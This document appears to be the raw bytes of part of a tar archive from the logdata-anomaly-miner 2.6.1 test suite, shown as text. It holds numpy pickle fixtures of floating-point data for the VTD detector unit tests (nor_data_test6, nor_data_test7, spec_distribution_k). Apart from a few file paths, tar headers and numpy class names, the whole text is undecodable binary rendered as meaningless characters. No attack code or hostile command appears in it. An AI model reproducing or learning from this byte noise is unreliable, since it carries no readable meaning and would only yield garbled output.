ůGcw[$GYjG*5GG%fNVgG?{¯!KG?|l9G>܅=G?Қj?>/TG+NdGVjGӴmsތG?ȼcЁ Gّ4mIfG eG?%Z>G?qYQGGŝ@o9tGWX(GLdNG?3F%VG?8ܞGZ>G?їcRG|HG?*MG?Z8FG?kG?_G8 EG+4{mG?gVNLkGd4٢G??eG?ĩWG?&UGի(WzG?܋:6[G?i*vS+G?nqG?IUG?!"KG?PۣG?r\>Gvv@Gg[^G?}G?}_"G?@G{ZCA}G?Lʊ`G? =ؐG?` XgG?_fiG?ۘ'"Gx;rXGIY>G?@ʵG?[G?ㄨ1daG?tiHiG?ogN%G?ȱG?IZ9˒G?4K%įGO}$dGr>!GG?ꙡKJG,G? (uBG?oҞEQG?j)KU#G?Y*5]GvG )G7 ~G?\$G/G?[G@qG?&,@G?kW'G?]G󦿥VGR+XG?,fJG?Z^%GT`G?w3GxHQaG?LjF`GUG pGڕ'GGoG?)G?#PaG?殉yG?CqwdGbG?thrGf&M\.G?FGGߙ0WG3)GyG?;uGQSôG;Gv iUG?بi]G?xKG9oG?gG/cG? G@2*G?<"G?;g4G‎G5/G?7NJG?fG?m^SG G }'G??+G?cjN G?繁G?G|!G?CIWG2pߍG" G`gG?СwuG?&Wn9Gف 1GP8]+GEG?G?3:YG?x"cG?Z2y1uG䀨Ԭ6GNyGé6G?ؘb靻G?H%Gv G(8WG?_YHG?%G֛H~G+GljG?x1`G}̔G?t;GVrG?,+~G!G?͛@ϼGd AG?<#$GZծG?f13AG O{G@ZOHG?jGᥥg7G?0qGr"TG?Ԝ؀G"BZG?Q̌/G=wΖuG@N7[hG 7G@5:GyGWuGDG?79Gt M+G? ET(G]G? G?ԏd[G?F~ԈG熋|ŪOG?")"TtG?% G?S8.=vG?-fG?jGѻVyG&G?Ҋ~0kG?%dG?{ G? ٓlG?g%G?yt|EG?)ⶉEG GӚ&VGvqG.'DڸNG.G?8DEG?ѯWG? G?:wSG施F|G?Jz8?G?V4UGO"~G.[GM^zkG?G^lXxG?quGf+)Gȑ{G?;YG?@mGpBG? 4,C4G7.G?o!tG_^b*G?8 z4MG8\X6G?xl9`G?R?3?G? G?s{PGG?G?)lfHG?pK& G?1ȌG 鎒G?;GP* G?k`fG?kG?1hkwU7G9GទzG?߁Ţ9GzG?%zG⿧ 'G? 8G?( GsG?"3˾2G^]XG(GR[GR6G?k RnoLG+e GevG?0G?lC٪ZG[M`hG$INnGzG%^? GDG@3\G!PڿG?1oG&4G?ڭleG?VIPGI2 >G? DG7lcG?2^GG?;G?]ؚ=G%(_4G؃; G kGިw€G^I7GKoG?;jG℅5G?qlG?}9@G?CͯG 5GQGjА{G?˙G?ܜѲoG?BG%|G?%eyG?@ +G3ҕGwӏG5G?b,Gْd )"GLդGťG'GF\=G$G?y:R G?$rX)GK1EGvG6=@GP0]Gy"GToZG[n?GUӛG?h~lZG?|GύحGAn~VG?DvMG }dG?fNG?'3G= G}~ok,G?pG?cG?hq)_AG?^GRG?ʢzWG4Q;G?X`GDG?!G?tqG?=a\G]2RG纰'G?8/G?*GT;{)|G?HfG?ňG?COMG`sBG/{`GG?7fGGw"wUWG?|[ Gց},G?;>G?{* G?/ G?iG?Ku#^(G3LFG?UYGMpG?~W@G?jZyG?ҡyG?]+n\Gy|EsG?6pBkGumGa#+/GroGG?4p dG?^mGD߱/MG? G?&ofGd<5&:G? 㜄TG?JG?IG@YM;G<3G?˛G6lnG?ꖊvρGWZ%G?ܣP8&GܨtyG?-G?Mx;G;17G?zG?\GYkGFG?_s(GG?C!nGzK(*Gt W=GҹR>G?qe G?σ“G881G? 4'G?ṢGr ^G?0=VG?;R͡G[5@G̪hG?cbXLG?t0, 7GP.G;z3MGCGuG?x^JG?8qzG?ѵ]G > G?X!G<eGp_vG?B>TGY6G?ҼlGZ'>G? ̇eGR=9G?vG?jG?`%λGP/RG7c*G?_ $GG?$TlG?(zG?mGsd@G?_wG?lpUG?KmdGoW5G2G^?GY8JG?=nGa{u"G{BG?`IGߥsMHGw!iW{^G?">%-MGڔaTG?N@G?o]PG?.}Gۙ-Go5G? 6}e~G?x*/G?e=HG?s:<;G.G?_qCaG?V(˾G⅀MG?"JBG?2eG? GشCf^=GOG?&fG?PX[G?ZG?;+}G?.&z qG& iG?68XyG_PG?LG:GS޻MG?tRG?<.O6GCtG??0eG?/6GKjG3;FeGCG]BG<G!GxWG?0G? G?*8,#,G`._G۳")G? SG?lrG?QϭG?E"Geq!GyG+ͤdG?CeJGfGco0G?_@ёG?+e>G?<9Gk=cG@^u~GwG?Ӳ'Go2G??GeG*FG?CNPG@6qG?KhwG]OSG?88!G@km{GzͫG? G#G?T KG8GcyG߾TG?ݶ3QS|G?*‡/G?P\G?.yG8ߌG?@a&G"f{G?X«/G񊫃 G cjG?d2G? G?MGes;G $Z$G9GV,Vٸ>GA%G?AϢHG?03G?&UPGy~SG-!QG: G?ZCGGG?[G| G?QG0GǴkGK/GG?w5XG?^{GB0QG? bG?x]QG3205G? G?kN|sG7fEe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/nor_data_test6000066400000000000000000000046301437606560100273250ustar00rootroot00000000000000]q(cnumpy.core.multiarray scalar qcnumpy dtype qXf8qKKqRq(KXq?Rq@hhC;oL?qAqBRqChhCM~' r?qDqERqFhhCBUQwqGqHRqIhhC(FJ?qJqKRqLhhCy~ @qMqNRqOhhCO_?qPqQRqRhhC3y0'ӿqSqTRqUhhCz?qVqWRqXhhC* qYqZRq[hhC<'ڿq\q]Rq^hhCmiv?q_q`RqahhC8@E޿qbqcRqdhhCY~غ-jڿqeqfRqghhC?'KqhqiRqjhhC|v?qkqlRqmhhCmҴ?qnqoRqphhCo?qqqrRqshhC%-"?qtquRqvhhC$zC?qwqxRqyhhC9h-?qzq{Rq|hhCBZ0'Nſq}q~RqhhC0k+jǿqqRqhhCVn#?qqRqhhC4?qqRqhhCQnʒqqRqhhC檔jqqRqhhC:p?qqRqhhCjq$qqRqhhC{qqRqhhCaC(qqRqhhCuj\qqRqhhC6Z?FqqRqhhC#dnqqRqhhCB]'&\?qqRqhhCJiɯۿqqRqhhC3qqRqhhCy?qqRqhhCX*ſqqRqhhC wqqRqhhC0:(sqqRqhhCTVkqqRqhhC{L?qqRqhhCxqqRqhhC{zjq†qRqhhC95qņqRqhhC*:-qȆqRqhhC^?qˆqRqhhClp?}qΆqRqhhC7MqцqRqhhCY qԆqRqhhCwYNq׆qRqhhCM̍?qچqRqhhC?q݆qRqhhCN?qqRqhhC}M/o?qqRqhhCR>ĿqqRqhhC%ڊqqRqhhCa6/?qqRqhhC|8Vo?qqRqhhC Y?qqRqhhC`?qqRqhhCbxZ ?qqRqhhCtL9+qqRqhhC+s{qqRrhhCҫ4@rrRrhhC')&rrRrhhC+bLLɿrrRr hhC@C{Կr r Rr hhC!vBr rRrhhC/Š~*rrRrhhCrrRrhhC ?rrRrhhC?$T?rrRrhhC ?rrRrhhC$L@rr Rr!hhCH1+??r"r#Rr$hhC̷&?r%r&Rr'hhCr(r)Rr*hhC[>u@?r+r,Rr-hhC쳚?r.r/Rr0hhCPVr1r2Rr3e.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/nor_data_test7000066400000000000000000000647021437606560100273340ustar00rootroot00000000000000i](](GyWQG$@9G?W66GiG? PGTGH:uG?z&˲G&[}G>, G?7̇ G?G?`[;G???jcGNG?햚'G?^7F.Gw-5G3 G,:Gՠ]PG?ѮG?RGtHT/G?ǟ Gʕ>nG-tL'GG?)$GU tG?d]=O1G?y,׵GnغGSG?bAG?|-ͶGA)G#w%*GpDG?$'G?ʲGw~Gӊy`G?mGgG?s&6G?גkGn0G?>G?7Gs6ɵCG?TtrNG?<)GG?jAtG?lIG\HpGǡG-GݧG?GrG?PIQG?dFQG?GѷT=D QG?qGg RmRGԾ܋$HG@fubVG?\6V G|G?u%G?eX G?l)$y\G̳}.GhdG?#tGG?۱&G@RxYwG?⵫1"GƱ TxG?XAGݰ'[G .G1'G??x5GE|F(G?XN 8G?;@sG7LGˀV=G6Rc Q G?K2G/*QG.VG?:G"HGUsGG?(@Gʵ诞pGFEk G?¡UGlG@ ,)eG?_GKyoG?KL+~G?”DG?O/vCGrwkG?!lVvGG?Ϲ~"G?3L%G?G?_GG?ܭ[GsH߽G?a<G?GCGn¬G?ñ3"G?ݔuG ؞GZj=|0G hG?+{kGҦG@)5G? q"G?ұG% #\5PGn}G>G?GG?}U ;G?ټG+* GVRtaG?=9G?ȷH x[G2%߫?GЩEGsjgOG?1;RG1&MޯG?;k G˨%>&G=:GgG?IKs"G?4F5xGU~G?XF_ G?aā]G!-$tGe.pG ]čG?\7jG6GGR4 GV ~ƙcG?Y)6 G?`懤G=D;RG?¤U.G?{!G7 5բGV&>G?,` 9G?UUvG?Q?CGN$FG?{זG?v{OGG G?`SviG?6(m G?vClG?GKն,GK+G\G?pMGZN1G1LG?87Gt:)GSQ]SPGƚf*GwYFGv!GawSl%Gސ ^G?¹ G?)3 G>ر-G"bGrvaG~]G2:~G FkCG.G`KwvG?gazGJLGtaߵG^cG?̣>[cGSGTaG@֛GcE.G?Ij G"GJSDyG#dPG'Rg#G? \A/G G?](zG?~QvOG={cw8GOf]`;G?nªSKG|+G?UGjY?G@CQTG h|{G8FdHaG?<@>G?ԍU<<^GĦ#G?hJxG?9rGڷ|GG? mGuGG?ǣGÓK^Ξ;G?'zG?-RyGRRG=GfZG r#TG??lGLPyLG?IGG5+]G?"/0G?4G?GFzG?WvG?kۦG>hQG=,.GpG?`GȃԻYGi&GB@5!eG6GHG?,ލyG@CG?G莩ZUG?MLGY L]G?ʉG?2, G?evG?⍭wb=G]GO 7ѰG?_$(nmG? koGD JGs/$GzG?b1GTUGCM|G?-A0G}UV G?WGhڌG~Gev5GZΈYG?+|t:G? \G?[ GEs>G?KeG^_GΰG?)mG?ʈPGB)GܕrLsGש-G4_D@G? LqG?=2G3QXG?b0IGߝHx GT}q G?xSt/G?悉L7GCCp%tGFqGxZ`G$4|GS)a[GƓDyG?CpGz{GR sG4pG?4i4@G?;*kG?DT*G?3p|6Go:G{(>G?4,:G?ɟOG?AG?ٿ-ƹG֠Yq\G?kGHG?B=G#v*IGx:cG?^)Gz3(G?9tG?lо7G2ŃG?Ȅ`CGG)TeG?`Nq4GjG?פ]%GɝQGG?ޜG?1RG@x4_!G? rXG?77 mGC7G4dG{G?pXG?0mWkGR6ƀG?}OG?qH:3*GTVUG?QnG?%yG?ZIVG?磑!IG0WGԿ\{G?cm/G? ]s7G?5&A%G_JYG?! RG?)AG?۩P\G?q9Gy1GĎc1GB|G?ddG?₵G86GYWRMnG?uS G@5;L0Gd3ftG-.bG?$rG?I6;G?ЂnGX'Gr˜cGPNNG?WGvtEG?=5 G?lJG a\=G}7GكqGElGЖOX}:G?cNQ8G-O]fG뵁G?ggMaG?w^-WG?g AGh""+GyT$%G%+GIDG?xI :G?64'GŠZ$(G?.>G?E=hG?鳁XdG?ٔBRG 6TG?KhG?bXG GʖS(Gd}3}G^}G|١G?׈pCPG?UGQG?G_78d5)GKIЉG,UG?ҽI GsG?̟zG? wGcGۓjG?WiUtG*UV8GW?@w G K2GGG?/s G{GWG@MIf{G?G G?J]I6cG[D[G?H|CG?y5GoչrG/4 GS^ GLR PGM0GhG@ 1!GAYsv]Gy*`G۝cG[څ[jG2K½G?6G)QG@.IjG}~UAG G? G+wذG?LqG?-&WGH2G?o9uG6l)>IG?nʡG ޢG&HGʬG?C@$bG?$YG?Z[G?eGKɅG\;aG?MG@Y6Gb*\1}G%;g\G"$ZG?aUG?孆G?^НG͞+*rG?I'&G?PGt(_N1GHG?sd}G@G?zQa/GeݢG?o2#4a`G?DM'G6bG|G@G?%G5 tGͼ;SǰGbG %[Gx;`~G@=~0G-A+ё~G?ՄPG;ryGܤ-Gǿ]GmGGs !=G?Q%rG?G@WCG G?ar,G?'IuG Pt%G?ZxG?%G١ -GG?K˃Gî1G?WSJ|G?` G?y#үeG?9 eG?GUjG?^$1aG^-G?@+SxG?4Q G?[;G?oJGԵeYGGԓk GҽmG?^蟭iG?3$l#G?΀?G@KiG?֧FC{G?MGG?l/GtFGӌT GCN rG?\Ĺ]jG"pG?.-G?½GܝRGJCG?-JbG?IͮӔGޓL G?ǃ_:G #ۖGח G?<@G?|ұ8!G:d$G?IG?eG?0 WPUGӰ\ɞ)G?܈wG?BKG?"R[AG!G?ܢk=?G7BBGEG2@G?-BG?چ=s:GG1Gsd-1G?NUGGbϻG?ZѭG?`(G?j̞G?ũ6Gre#%G?kgu/&G&^G?dT!GF4d9G2 BG?䄹`G&GI ?!G?3d oK Gƈ!jުG}~LG[г G?ǃGboYG?~1eXG?ِ%,rG]4G?7%#^GC2.sG?tWrG z1^G?z#G?1bLG?ܤ&G?$|8G?70hG?RR pG?qoA]5G? :bFpG?zSQzG?&iG?P~G =GG皠٘#G?Тb😉G?@r!GMܢĬIG?2qmGߔ'7G<}G-CG?,GGS-G?pTG?=mG?̱?bG却RQiG@\FGsNsEGRD7Gϣ1G]"gGƶ?TG?`* fGrS2CG?:@GX}GlNG?pcGG?3fTG?kyօGbG1G?jG譧GAf~AG?i!:G l GU5ʼG?|G?EY'GPIG#&şGe\G?kyG?'!tG?§:Gȅg8G@0r G?1EGHOG+oG,x_G1/&Gxn'Gwd5Gю}Gx.G?%@G?L!z)G?㴬4qGZHCOGگG{GiG&wnG?[0GdG?t@0GX7HGAHlG- G?X {G?!ǝgG@ G?y٤oGp[G-DrG?/!G?m3Gp"orGH%sCG@&ujGi(G"\@G?1(OGܚo2G6G7qxG lG@lhiGnw/G7G 0G?MY+G]3/EGsGy VG?7;/dgG>D(G?0+}GhsG? "Q-G?ٺ1 TvGlʩG?]*\X G&GGERG?΃:!Gb G?9NGd>GG;BG?eMG?OG?t4GcrG?dG?plG?*{&G?Osj?GAYG29G?`rh͒G@CAG?!7kFG=b]G?S5GA<@G/4 GH!G?*$TXG?DEWGJGS@G?QG?j4Ғ G?ONG?zpG>*#G?HNW_I7GfJ_G?'T&G@>G: Gj+G4GS#GеtGstА/G?؜=G̎GEV!OGшG?Ѓ;+G?sG@4_#|G? f>-G?3,>GweGmN2G7EG?ֶ onGiECEG?y%XP\G?G'YG?6AnG?pG?lGQG?2GA4TݸGaG?#)iGO]G?:)$.G?,4G? U|AGA(G@tI2UG?H5EG; ݢG6o0G?pb?G聯`GqhQG?GJG?xF&bG?9Ҭw'G?d)ߑ+GrJG?N1KGR#G?YG?$)n~GlxhGGڬG?r'G?[@G6@2RvG?ޏ)G?ywGJ3RڎG?j567G?19qGkS IG?9$b̄G?t1G+G?`q|G?ֺ_J:G|hoGI)ߚG}#>BdG?k-G?=G?ٍ T}G?2G?+G--bG?9iGs``x*G?DG?3\^G?ĊBtG bG7TG?I G?cFMG/`Gpz:G?ʽzGCXLG@Y[FGGGiiCGvɱFG~1)xG?Rf=G?i_HG]~/G?D'ݎG?F&G?nhW)6aG@ߔe(G4WfG \G )GXچTGёR0yG?$"+nGޫG?Q}G? *G'G?hGdݩ9G)G%վcGaK_G]#G?9GtpG?XGvGGk۟(y5Gj#G?a~B G?wgKGnGdCG?%/GӚ92Ghx]G?ՊnN'Gw|nG?zu@G`'2ChG?`)2G?[3GڎEaGOdG? UuCGĂ4G?NPkGOG?LjR˥G?ngG>QG33rrG!G?NT:GG?]ڐG?nG֟I8rIG@_G:nN(G?%iGۥ@!GFFJGsG?+ 7}GG?$G?ᮢaG?IGЄVCG?L<%Gv6GQu#\GtzI;GfQG?,CG?,#G? G?ӿG&G?ɲsMG?7G?}1G?~h,́G̊ÛGwG?% gG?3"UG?UWSG%(^G?VG?ݎ]G?.:G?FzWG:֪GCG?[GԺGqyH]G@*}y\G&WތGQ4G?/zlwG?80iG?zmc{G?~8GӸOĀG|PG? LG?=8G?@G4~FGQ.]DG?''`G??G?(GH5FObrG' aG?GG?q_uG-3"GB@s^G,G?v0GG?BKہ3G?ܰyGHw[G?)/SG?2ng/G?ϙZ@G9G5ϳG G?C޷G?!voGi4:G?TG(EJG?{m~aG?9VGGѥ@GSJG?̇Gm$G֛hG?嶎$ G?ꝨfG?*}CG?ZMNG?LvgG?F"'GؙjDSGC~mKGuwG?Ԛ[,G?H.G3$ ^G]G Gs֌жGCG8_n:G?JI{G㊌G?y("=cGIօpG?iG@K2G?-GF7jG?[OG9GPG?܏GHYG?vѨG&Y'G+dr-G; G?G?lj9jG6XG?7LcGsG?0#"G?%AtgG`}Q3G?ހ G?@'7xG?CvG?E Gd:G?ȳG?\kG?>ޥRGڢpGw&DG?q,#|G?[_G@zG?ϙ86WG28G?*G?߄U5zG2;2uG-whG?gٲٖGPAM۪G?\gG@G?QGvAGrN ƍGcCsGBY|֣G?,,~ޫG-G9{sG? qm)8G&6G?F; GSFGV/9G?+ G?>BG?c[[SG?:NG?mq~G엎KG?ߏGQ@G?s!\QG?tlFAG?ߊj]G?/GOG̋İz7G?I9YG?3G??5dGHGhIG?o3GJ`kGm9uG?)sG?LJJGyn GQ]G.ŦeG?|G?!> G?UG?JeGpG?vyZG]@G?OM@G?iZG?8H$ tG8*GS|G¼so+gG GXF^$G?ЩGUa\G?gXG?#WGG?|]PG?GOOG?>+GJskG\G<3G?+NG+]ėGnܡOG?@lEG'G?u_-EG?EvG,G|2KBG?3gLGQtKG?^MG] 6G~D.eG?k4t&}GGj.4ɂGK=LG?J4ebG?󆃊w_G?2unG?ݨ1GYmG?ޠWkG=ϹK-GM]NGp*GG@P[]aG?<KG2k\.G?뭡@;7G@:~df6G?$/6G_ G? s[?&KG?r.CG?@zf]G?WSG=~G?iG|M(G?"A<G?@@G3 G?3k!b Gڄ.{GbǠCG^1VsG`BaGB'2G!IGeG?бlG*HG?pMI}G?qAIG@'G?ض tG黳ݩoG?~JWG?.?zG ƶ G?Rm#G p0wG?OsqG cG?3@G@j"G?I*G?dzORG?M']RG?ꎣ$4IG?9 FG?%krGh^GKnGws-G@N_G%% NG?ߞ+4G?bG;1ueuG?߀(G?Ҍ0'G?sYGߕEAG?ؓPFG.ȩ?TG?`R8G?T G?֓hGe8 G?Ϣs5GftG@I>>G^G?6G$AzGw\}5 G3G?:"GΈNG\c:pG?xGf "G?kzWGBG?3OG:o(p^G?&>*EG?ᘪsG?KGD6GxUGSӈ*YG?.AGνGȸG/ Gھ.JeG?ÃwܤG8ZaG+SˆG?| OG?$,G0_zSG?єyT G?ǿeAGu˨jm"G?HG_PG?4NϒG?5'G ݛ"GZ>G?FY_G?i@d)GiBAGĞRGGcG?'YG9G@S7&G?b|iG۝5G?R\G?dGٍԜ,GG։0Gq5G?G?ǴG)G?'0V^#G?jv"G?$G?xojG? {5G?_y SG^MG?Xt&G|PkG? $5tZG I,̬GAg"4G٢bŏG?BG?^ $G?[D8HG> GcKYG uעGļnG? ηgGη/G[y~G?ZuG?TF=G?4W*G5-ClG#vzGUG#شG?cGAbGkӑpG?ߦJxG?sW}4GG?!wrG?YE"G??<GǁcG*G?Z2aG?Mϛ,GΌG?qF5GGG>9 G?b<G?m Gո"~~G?kG?s sG?}e^G??GG8hdGsN6AG?'G?u dmG?]{Gve) G}G?X ^VG? ɎG?ȣSgHG.MnG*^%)G 'G?טoGbuӳG?jzG`g3G?ikXG?{:nGQG.FGTI[eG?A%G 4CG?@dG?3ӄ.G?%UG?zjt-GFAG% ޯNG?CG_AջJG?q^G?L fGY#/kG鿖FG?5吰XG?GFx~G+>GdyDGώGSD!G.5G?᤹dܰG?i}2?TG?Q WG⻲)NxG?P)2G?ʖYOG?Ӧ%GGءRGۦG YʪG zG=%G? ©AG+h! G?;-o1G 5GuG5ciG@XYGIgwG?Q;G@ RG? qG?LxG wz"G  ٙG  Gi/G?ݷ82G?;9~Gծ {G?6zG?7;QGG1G@6Rr۔2G_G?<#^G?fG~iG8rG6?ZGD񔁵G? {G?5ޫdGcBG?ĈsYGcڃ4G?پ=G?=W!GwގGRrGH㳉G80G?C4GT3可5GۄzqWG?YwG?e G?/GGتG?ԯQGxcXG?Ӗ8B%dTG?PG?Y\EG?LVkG?=QG_.UAGsyóG?xzq G?U4ǷG?7@bG?e;G? M%G}G?@wkG\9G:әڡG?O;\˄G?-u?G;\wG@ioGtG!MG?ZX1G?wJG?4;WiG*R&(G?厯˓GJ4ؓG?.6nGΎΊG?\GӌeGdw ]G?^{#G?zmRwG?ߴ pGT]rG?&pG?yG?G#-ZGx0G?;G𡉃{G?UeGms͊G,jG?E-[G?LP2 G? (G?Q G?46SG?^0G?IbGg.zڍG?DG?.^JG?F:@GhG?3aTG?Jg~2(Gp GŐ]AG?r2G?|GƉ9O&G?P@9G?نV}=cGBmG?ds.HG?!$.2&Gc`G?uבGSG!nLG?lGXY'ʬG?`%-G?vKG&G?5 /oG*GQ{G+ήG%MgBG?E|Gqd-GxL,;G&?bG;(hG?q G?­!epG?@H͛G::mG?烝G?O_G!()>G?_dG?2WG? nLG?PfK(DG?㻦)ԍG;nG.uG?tڔyG?GVG?ϴG? \2G?K/G뜾G{G?B4GnG?GGΒ pG~]G?v7G;?OG?꠼GE뛲G?KWG9ϣyG@Y:ąG?s_`GZ*?.GohG-C"(G԰>%G/dmNG?e`pvGٲ?G??#G@udtwG19,3GWR@G?`vjG?E -)GP4GYG?ƩG?vGvm~G?hG?E|mc.G?nG6-lQguGl;W_3(GiRG@^GDaVYG-/GG@,X*G?|G{tVGُm!ѵGs G]G [z!2PGu+GOG?d%\G?BXGGY])G?z$z}G?ϬGflTG_bqG?ﲯlXG@B'G?yTuaGjPG?Ѵ7n-G?ñH×G ЖG?KGSVGu G?1wG?x*G̥-,qGмެG?ӪoG?.uG?EUd*^GPF\GuG?)?PG?MG}{+(G?R^G?rFG?uiЊG?A2>fGQG?5&}#d(GG GYjGZ:UG?,~QG?{^%LG?{>G? G?+VޫnGݽ@xfG'dG?tB9G|{GPsG,Q*G?4rG̳U 3G?d)G!aRGcVȃGrАG?uG&VxG?0MG@GhjGӟDFUG?"qGYG?0Gz[G?[NG) G?w G԰HG߿0TtGwzg-G?yp/(G?% (G9G?4pFLG?,K G6zݥ1G <ǃGDG?LDݍG?YѭG?oX]G?qG?[E2G2g;IvG?^|X>G>M "DG?X!lGtGǖO^G?̿44GM3KGGRKZG?>[{i G?G?"ɿ~/GOրG?3yjG?'G?I9G?ozhG?fUGP1RIG,9G} G?Dž+vprG?ŒC=G*OG?6JcG?U%eG֕duYG6{GϘ"ihG?>GVG$EGHm;G+G}ܣG?vGЍGcG?ׁ!eGS*L?xG? zuGזCňOG?dG?uIG?`H)GvfG܂:IaGG?Sd&N}GQ qG? vX~9GTvWG?Xv-RGewkG0*G1@HG!sRGH$_G?섫|bG/IGz뱒'G?ֲB@)GROG CG;]NG}`G?aGMGmthoG?\G?ɌJ\6oGb2 )iG?@G?];BtG$?G?b} G2DG?)5KG<G?&;G#^piG?%..gG?e:_G?ZQ G?{"hG?&}GjٟG?J,p[G?ˬQhG.فNG?4F1GЋ+nG?Y1G@ ywUG?9G?W]lHGȶ.G?SQyGpkGճ[#lG/EG%2sG?fWG?k;G?SaGU&hG\nG@s^JGl|G?kqmG?ʫX'*G䷦8G'ƻ@G?dQGG@sO.U5GrkHۡoG?9G?XNAkG?(F4GȪ+&G?fG?ja~gG?/o=G?ӓioG# G@(G'FG?E1Gp$Gn]G*G7BG?jKEG?s[ b_GzGE.%eGlG?h nUGӮ51GgG9qG?Ӡ8ǏuGw4QG?Չ=G?;cG [G[BG?'áG ZGxPG?)W G?d|G?+3GGB{a=G?6EG?P "x/GL=DrGC$6OeGA?G? G,NG0G{GyQG7i$iGڅ\b *G?eH|VG:5Ba4G?VJG@hGˣ({2G?NJlwG?UGuZGdAJGJHrGbG7aG! 1G,/j];G?6=}[G?!lGMBRGwO54wG,k7+G@`x U]GXG[@JsGYlG?z02jaG,5Gi<^G?tGGz G4GG D !GG?nI@2GL.OzG?^G?jЋG?'HG1MG-ir@G?ZqdG?ǬG?_gG?(KGЀGȻuahG?A2G?GtG?<6G;9ƨG⢤TG\zaG?ҧe}YGy-G ʄG{iGsGƁk,G?Ny\G < G{dm-6eG?hG?긞.GZd}aG?i$GǚhG?4oGvTGF݃gG?uw'KGw1u'G?*idG@FBCG?MZ.G(fG?םtjG|LqG?^өG?ֈW;GvMeɊG?e.wI=GG?-\L-cG?tR G?)},ǷG@ٲ(oGlI8GF[G?{BvvG?2xGwG?,M*G{ljHGeo )G,uG?+ `G?;%YG鐪GVVGpIG啞SGC@tGj&G՟JG?4Gw'19G?T3 G?%7GY?G?$cG?GtGόHi$G}{0GE Gʣ}`aGI|ReG?)^eG?M=G0UG?EpqG?v,UGɥ:G^Ա~6GKG?̢GYG0G?RtQTG?X޾xG?ȁ[4xG?&GاX؀/GNr GWG@SAG?.-2}G?6yG U̟GG?IsG7bXG G?R^SGDm BGebgG?C`3vG/і4G?k,RpGз!R`1G?V5/G?ctG?,:؁G@Տ GbWnG_i\WGB GЄvG?ᗁNG?SFnG:G?Jc=8Gc*.G?f"B3+G;,`G?OpG?’wGArG5"N%AG?3lG-K"RG@q&G逧qOG?GnNG_7GfG?.2V9G?= G?l$G?ޣ8l3G? PG6$G?X&rG?(=G? +>KH6G?rWG>eG?3WGlG?d-bG*tMG&6FkG?탕ZGc89HGfTG?lT>G?.!GdㄯGuvvG֌ FlG? yG?{ݒ"DG?7rSG? CfwG?z7]G?ejG?ي;>G?RrCyGR"G?J{G?ЀT\G ˇUGڶ&Ge](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/spec_distribution_k000066400000000000000000000177371437606560100304700ustar00rootroot00000000000000cnumpy.core.multiarray _reconstruct qcnumpy ndarray qKqCbqqRq(KMqcnumpy dtype qXf8qKKq Rq (KẌ́g׼YNςV:im\P~7(n2?j#FQE!7g*3pWZcN%)nX ox.aІPjmrs@3TG|:̕!D oՎvG]XQPD9+Z.[* }oA}np-JXcW׮A=q\)1ᕇ$e*$|3 nppDcwW=fJY2G%B9 Q+[ p[s}f *ζ Z󿞮YeM/3@󿾷4Os斏;|+Hvԏm,2ie]q\ RP~C Z7򿞗[*Dj!`H|C Q%}epCNZbWo7Kr$>!@2yF%[ҫbvj4h RD܅4y/SpI8Uh,_:e>SrF,Bd'>񿍚L5H-~w[ nT2k Ϭ/wD];Q^\Q-sE o<3ȉ. ,#)\pvW52!|7s>{Bk;bԊ+VE-IyjA 8:Ns50𿚦Q'LV\Wۉ\? /q?P}"q=Ȋ d￾4R=Ԧ£}\|dWcᅢ{xRFYTA 3.0Ǻw￈kHh%.EJ X@Q&#wSk]Df4\RLSe93~"›wu U(LN*ِ'KىlFΛLe,?z^q1i_QXrG?6&D 0R g47'ۻX y쿨FeniG쿉l쿪 xlm>[.k_JF_9%-1 2.X뿶$v@vE7&Pfk)뿸R[HYd~ o뿼g+^}ALM=wLm<'+̮뿁 뿣Û12꿃L- SFqs^꿈@pւHIqjkX꿌RY?Mz. 4܇ a 꿎e:QF12S xRjF+Å鿗tXd}%S-YFB6@(@'k连^R :,~ZM迢d3nmyvw迤'֘fgrV(_K3EGF+i-ו*Lr翭bn^@<.:Zɰ4 3җzzSi翴3!-Xte H5@7Ea&翸33濺F}j&>ЩGh濿|Y\-5}濡6{[d?l K濄-:GsN)R:Mo)[! Id Mő忍vd4M'>U_vΈ6Hgr|MKU=忓.;,T@\v'N 忘XpSm!F!俛!A[3fb䪫>4j_x7P @W'/俣GH. O㿦Y(f|(- '.㿩lOj?fp㿌H!m㿮QSnB/2cM~5!m43v &`⿴פt69.orH<⿸!]٣gpV⿼]ʆE|`5>S9"$_: !ńAf3wP֖IǦj{ῇWGjIhY AHi7ῊZ'Ῥ#A: ,(q࿏lYO2? 2HQTQė6 qW~ղMJxm࿕c#\࿷lyiJCu`)࿚&Za=6]v߿z"+߿4߿A@g߿ F߿FYF$߿kc1޿}1 ޿LߺoM޿@D"{޿QY޿W8޿Ue9T޿iݿ7xݿ\[ݿLmݿ`iKݿ *ݿ#"pܿg4>3ܿ&ܿkPhܿXJ_ܿ-k -ܿq}vboۿۿv@ۿz4ۿ8bۿ|Ʈ/ۿ'8D;ۿ|ڿJڿC5!ڿeڿqpsCڿ%"ڿ 4HڿNFQdٿX ٿOyٿ2UWٿ}5ٿY5ٿWؿٮؿdjؿ#6]kؿd¿8ؿN"ؿ]ڄ׿.,f׿p)׿2>j]׿3};׿E  ׿9XdqֿGֿ=wֿ|6qֿ8>ֿD ֿ&w=տHd)տ8տ h#tտOAտK^տSX Կq KԿ!?ԿZ3 #wԿ۔QUԿ^3ԿW:Կ#jw7ӿe|ERӿyӿi_Gӿnk%ӿcӿr}$ҿK ҿ|ҿxKK+[ҿ,l9ҿ}ҿ <ѿ3RsѿDE TѿW8Mѿ wz+ѿE ѿ |пOX`п&Âпaпc9tF?п&п!eϿ<ӽ|pϿY_ ϿG$οIbοPv+οRe.ۮͿډsvͿ]f 9Ϳ"̿h9F̿jF̿q}ʿ˿s@hM|˿ds˿~ױʿL"Znʿ5b*ʿGaɿ &ɿɿ@ȿd%vRȿ'ˊȿ|ǿTǿ1Ҍl"ǿ(ƿ7śOXƿ?aſtſņ}lſʈ(ſR5cĿ)^Ŀ]m)ÿ Aÿ6Pÿ/ ÿcBp=¿sއd¿zQ4O?ib_&4!ſ8GZ>>YVtN੽^j߼d4(hMv@szƘu ѤX 븿A y22V3a|F[M:͈5%T[Z,WaMo}̱2< |t 8&Y0ۮ.=ͭJ=KR:Xh@0m~d򦿪K]mȣ3Ng瞠~~'7-ܙ[@I!qlew1R}s8bYja;X?YRm?K' 